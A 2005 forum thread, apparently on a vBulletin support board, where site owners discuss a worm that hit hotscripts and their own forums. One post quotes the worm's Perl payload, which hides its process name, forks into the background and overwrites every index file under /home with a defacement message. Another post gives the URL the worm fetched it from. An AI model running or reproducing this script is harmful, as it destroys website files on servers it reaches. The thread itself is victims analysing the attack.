hotscripts hacked

**Dave#** · Sun 6 Mar '05, 8:06am

What bad luck.

Doesn't surprise me with the amount of people Inet (Communitech) have pissed off over the years.

**The Prohacker** · Sun 6 Mar '05, 8:40am

Originally posted by Dave#

What bad luck.

Doesn't surprise me with the amount of people Inet (Communitech) have pissed off over the years.

This was not a direct hack. It was a worm type virus. I'm afraid that all I can post but I'm sure you'll hear more about this worm in the comming days.

Also I work for iNET and I didn't work for Communitech

**someuser190826** · Sun 6 Mar '05, 8:43am

Seems to be good now.

**Dave#** · Sun 6 Mar '05, 8:48am

Also I work for iNET and I didn't work for Communitech

Whatever, Inet are just Communitech under another another name.

Personally I would find it difficult to work for people like that.

**patriotcow** · Sun 6 Mar '05, 9:01am

I am not php expert but was it this?

PHP Code:


  #!/usr/bin/perl
 
 my $processo = "/usr/local/sbin/httpd - spy";
 $SIG{"INT"} = "IGNORE";
 $SIG{"HUP"} = "IGNORE";
 $SIG{"TERM"} = "IGNORE";
 $SIG{"CHLD"} = "IGNORE";
 $SIG{"PS"} = "IGNORE";
 
 $0="$processo"."\0"x16;;
 my $pid=fork;
 exit if $pid;
 die "Problema com o fork: $!" unless defined($pid);
 
 system("find /home -name index.* >> index");
 
 open(a,"<index");
 @ind = <a>;
 close(a);
 $b = scalar(@ind)
 for($a=0;$a<=$b;$a++){
 chomp;
 system("echo spykids ownz your server > $ind[$a]");
 }
 
 system("perl zone.txt");
  exit;

If its not suitable here please delete. thanks

**wbear** · Sun 6 Mar '05, 9:26am

That's PERL not PHP, and it appears to search and replace all index files in /home with the "spykids" text. Script kiddies, from South america, at a guess.

**dictionaryof** · Sun 6 Mar '05, 9:35am

It was indeed that. One of my servers got hit...

**dictionaryof** · Sun 6 Mar '05, 9:37am

Don't click this link, but here is where the worm got the script from:

compras.el-nacional.com/spykids.txt

I suggest a safe wget or something other like that.

**dictionaryof** · Sun 6 Mar '05, 9:39am

Also, here is what the access log call looks like:

-- Removed - Contact me if needed. ;-)

Note that I am / was still using 3.0.3, so it is possible / probable the upgrade to 3.0.7 fixes this ??

**Mike Sullivan** · Sun 6 Mar '05, 9:53am

Note that I am / was still using 3.0.3, so it is possible / probable the upgrade to 3.0.7 fixes this ??

Yes. Or if you didn't have "Add Template Name in Comments" enabled.

**patriotcow** · Sun 6 Mar '05, 9:55am

Some have an irc left there me goes to look

Spykids ownz you!! irc.brasnet.org //j #spy [email protected]

**The Prohacker** · Sun 6 Mar '05, 10:10am

Originally posted by Mike Sullivan

Yes. Or if you didn't have "Add Template Name in Comments" enabled.

We had/have it disabled on all of our forums and yet one still got hit by this worm.....

**Dean C** · Sun 6 Mar '05, 10:14am

I've reported posts in this thread several times, but publically posting exactly how to exploit vulnrabilities in public is not very smart. That server log shows every tom dick and harry how to exploit it.

**dictionaryof** · Sun 6 Mar '05, 10:16am

log lines removed.

Can someone confirm that the upgrade to 3.0.7 will prevent this from re-occuring...

The upgrade has been completed, but don't want to reopen the forum til it is confirmed.